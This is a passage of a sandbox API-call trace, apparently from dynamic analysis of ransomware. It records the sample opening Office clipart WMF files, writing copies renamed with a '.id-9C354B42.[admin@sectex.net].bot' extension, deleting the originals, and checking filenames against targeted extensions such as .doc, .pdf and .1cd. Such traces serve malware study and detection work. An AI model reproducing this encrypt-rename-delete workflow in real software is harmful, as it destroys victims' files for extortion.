	[0164.639] ReadFile (in: hFile=0x3e8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.639] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0164.639] SetEndOfFile (hFile=0x25c) returned 1
	[0164.639] CloseHandle (hObject=0x25c) returned 1
	[0164.639] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.639] SetEndOfFile (hFile=0x3e8) returned 1
	[0164.642] CloseHandle (hObject=0x3e8) returned 1
	[0164.642] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.642] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152556.wmf")) returned 1
	[0164.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF") returned 63
	[0164.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF") returned 63
	[0164.643] lstrlenW (lpString=".doc") returned 4
	[0164.643] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.643] lstrlenW (lpString=".docx") returned 5
	[0164.643] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0164.643] lstrlenW (lpString=".pdf") returned 4
	[0164.643] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.643] lstrlenW (lpString=".xls") returned 4
	[0164.643] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.643] lstrlenW (lpString=".xlsx") returned 5
	[0164.643] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0164.643] lstrlenW (lpString=".ppt") returned 4
	[0164.643] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF") returned 63
	[0164.643] lstrlenW (lpString=".zip") returned 4
	[0164.643] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.643] lstrlenW (lpString=".rar") returned 4
	[0164.643] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.643] lstrlenW (lpString=".bz2") returned 4
	[0164.643] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.643] lstrlenW (lpString=".7z") returned 3
	[0164.643] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF") returned 63
	[0164.643] lstrlenW (lpString=".dbf") returned 4
	[0164.643] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF") returned 63
	[0164.643] lstrlenW (lpString=".1cd") returned 4
	[0164.643] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF") returned 63
	[0164.643] lstrlenW (lpString=".jpg") returned 4
	[0164.643] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.644] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF") returned 63
	[0164.644] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF") returned 63
	[0164.644] lstrlenW (lpString=".doc") returned 4
	[0164.644] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.644] lstrlenW (lpString=".docx") returned 5
	[0164.644] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0164.644] lstrlenW (lpString=".pdf") returned 4
	[0164.644] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.644] lstrlenW (lpString=".xls") returned 4
	[0164.644] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.644] lstrlenW (lpString=".xlsx") returned 5
	[0164.644] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0164.644] lstrlenW (lpString=".ppt") returned 4
	[0164.644] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.644] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF") returned 63
	[0164.644] lstrlenW (lpString=".zip") returned 4
	[0164.644] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.644] lstrlenW (lpString=".rar") returned 4
	[0164.644] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.644] lstrlenW (lpString=".bz2") returned 4
	[0164.644] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.644] lstrlenW (lpString=".7z") returned 3
	[0164.644] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.644] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF") returned 63
	[0164.644] lstrlenW (lpString=".dbf") returned 4
	[0164.644] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.644] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF") returned 63
	[0164.644] lstrlenW (lpString=".1cd") returned 4
	[0164.644] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.644] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF") returned 63
	[0164.644] lstrlenW (lpString=".jpg") returned 4
	[0164.644] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.645] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0164.645] lstrlenW (lpString="J0152568.WMF") returned 12
	[0164.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152568.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0164.660] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=3696) returned 1
	[0164.660] CloseHandle (hObject=0x3a8) returned 1
	[0164.660] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152568.wmf")) returned 0x20
	[0164.660] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152568.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152568.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0164.660] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.660] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152568.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0164.661] GetLastError () returned 0x0
	[0164.661] ReadFile (in: hFile=0x3a8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xe70, lpOverlapped=0x0) returned 1
	[0164.663] WriteFile (in: hFile=0x1b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xe80, lpOverlapped=0x0) returned 1
	[0164.936] ReadFile (in: hFile=0x3a8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.945] WriteFile (in: hFile=0x1b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0164.955] SetEndOfFile (hFile=0x1b4) returned 1
	[0165.859] CloseHandle (hObject=0x1b4) returned 1
	[0165.865] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0165.865] SetEndOfFile (hFile=0x3a8) returned 1
	[0165.867] CloseHandle (hObject=0x3a8) returned 1
	[0165.867] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0165.905] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152568.wmf")) returned 1
	[0165.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF") returned 63
	[0165.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF") returned 63
	[0165.906] lstrlenW (lpString=".doc") returned 4
	[0165.906] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0165.906] lstrlenW (lpString=".docx") returned 5
	[0165.906] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0165.906] lstrlenW (lpString=".pdf") returned 4
	[0165.906] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0165.906] lstrlenW (lpString=".xls") returned 4
	[0165.906] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0165.906] lstrlenW (lpString=".xlsx") returned 5
	[0165.906] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0165.906] lstrlenW (lpString=".ppt") returned 4
	[0165.906] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0165.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF") returned 63
	[0165.906] lstrlenW (lpString=".zip") returned 4
	[0165.906] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0165.906] lstrlenW (lpString=".rar") returned 4
	[0165.906] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0165.906] lstrlenW (lpString=".bz2") returned 4
	[0165.906] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0165.906] lstrlenW (lpString=".7z") returned 3
	[0165.906] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0165.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF") returned 63
	[0165.906] lstrlenW (lpString=".dbf") returned 4
	[0165.906] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0165.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF") returned 63
	[0165.906] lstrlenW (lpString=".1cd") returned 4
	[0165.906] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0165.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF") returned 63
	[0165.906] lstrlenW (lpString=".jpg") returned 4
	[0165.906] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0165.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF") returned 63
	[0165.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF") returned 63
	[0165.907] lstrlenW (lpString=".doc") returned 4
	[0165.907] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0165.907] lstrlenW (lpString=".docx") returned 5
	[0165.907] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0165.907] lstrlenW (lpString=".pdf") returned 4
	[0165.907] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0165.907] lstrlenW (lpString=".xls") returned 4
	[0165.907] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0165.907] lstrlenW (lpString=".xlsx") returned 5
	[0165.907] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0165.907] lstrlenW (lpString=".ppt") returned 4
	[0165.907] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0165.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF") returned 63
	[0165.907] lstrlenW (lpString=".zip") returned 4
	[0165.907] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0165.907] lstrlenW (lpString=".rar") returned 4
	[0165.907] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0165.907] lstrlenW (lpString=".bz2") returned 4
	[0165.907] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0165.907] lstrlenW (lpString=".7z") returned 3
	[0165.907] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0165.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF") returned 63
	[0165.907] lstrlenW (lpString=".dbf") returned 4
	[0165.907] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0165.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF") returned 63
	[0165.907] lstrlenW (lpString=".1cd") returned 4
	[0165.907] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0165.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF") returned 63
	[0165.907] lstrlenW (lpString=".jpg") returned 4
	[0165.907] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0165.908] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0165.908] lstrlenW (lpString="J0152594.WMF") returned 12
	[0165.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152594.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0165.908] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=6340) returned 1
	[0165.908] CloseHandle (hObject=0x3a4) returned 1
	[0165.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152594.wmf")) returned 0x20
	[0165.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152594.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0165.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152594.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0165.909] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0165.909] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0165.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152594.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0168.568] GetLastError () returned 0x0
	[0168.568] ReadFile (in: hFile=0x3a4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x18c4, lpOverlapped=0x0) returned 1
	[0168.590] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x18d0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x18d0, lpOverlapped=0x0) returned 1
	[0168.590] ReadFile (in: hFile=0x3a4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0168.591] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0168.591] SetEndOfFile (hFile=0x25c) returned 1
	[0168.591] CloseHandle (hObject=0x25c) returned 1
	[0168.591] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.591] SetEndOfFile (hFile=0x3a4) returned 1
	[0168.593] CloseHandle (hObject=0x3a4) returned 1
	[0168.593] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.593] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152594.wmf")) returned 1
	[0168.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF") returned 63
	[0168.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF") returned 63
	[0168.594] lstrlenW (lpString=".doc") returned 4
	[0168.594] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0168.594] lstrlenW (lpString=".docx") returned 5
	[0168.594] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0168.594] lstrlenW (lpString=".pdf") returned 4
	[0168.594] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0168.594] lstrlenW (lpString=".xls") returned 4
	[0168.594] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0168.594] lstrlenW (lpString=".xlsx") returned 5
	[0168.594] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0168.594] lstrlenW (lpString=".ppt") returned 4
	[0168.594] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0168.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF") returned 63
	[0168.594] lstrlenW (lpString=".zip") returned 4
	[0168.594] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0168.594] lstrlenW (lpString=".rar") returned 4
	[0168.594] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0168.594] lstrlenW (lpString=".bz2") returned 4
	[0168.594] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0168.594] lstrlenW (lpString=".7z") returned 3
	[0168.594] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0168.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF") returned 63
	[0168.594] lstrlenW (lpString=".dbf") returned 4
	[0168.595] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0168.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF") returned 63
	[0168.595] lstrlenW (lpString=".1cd") returned 4
	[0168.595] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0168.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF") returned 63
	[0168.595] lstrlenW (lpString=".jpg") returned 4
	[0168.595] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0168.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF") returned 63
	[0168.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF") returned 63
	[0168.595] lstrlenW (lpString=".doc") returned 4
	[0168.595] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0168.595] lstrlenW (lpString=".docx") returned 5
	[0168.595] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0168.595] lstrlenW (lpString=".pdf") returned 4
	[0168.595] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0168.595] lstrlenW (lpString=".xls") returned 4
	[0168.595] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0168.595] lstrlenW (lpString=".xlsx") returned 5
	[0168.595] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0168.595] lstrlenW (lpString=".ppt") returned 4
	[0168.595] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0168.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF") returned 63
	[0168.595] lstrlenW (lpString=".zip") returned 4
	[0168.595] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0168.595] lstrlenW (lpString=".rar") returned 4
	[0168.595] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0168.595] lstrlenW (lpString=".bz2") returned 4
	[0168.595] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0168.595] lstrlenW (lpString=".7z") returned 3
	[0168.595] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0168.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF") returned 63
	[0168.595] lstrlenW (lpString=".dbf") returned 4
	[0168.595] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0168.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF") returned 63
	[0168.596] lstrlenW (lpString=".1cd") returned 4
	[0168.596] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0168.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF") returned 63
	[0168.596] lstrlenW (lpString=".jpg") returned 4
	[0168.596] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0168.596] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0168.596] lstrlenW (lpString="J0152602.WMF") returned 12
	[0168.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152602.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0168.596] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=6276) returned 1
	[0168.596] CloseHandle (hObject=0x3a4) returned 1
	[0168.596] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152602.wmf")) returned 0x20
	[0168.597] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152602.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152602.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0168.597] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.597] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152602.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0168.598] GetLastError () returned 0x0
	[0168.598] ReadFile (in: hFile=0x3a4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1884, lpOverlapped=0x0) returned 1
	[0168.625] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1890, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1890, lpOverlapped=0x0) returned 1
	[0168.626] ReadFile (in: hFile=0x3a4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
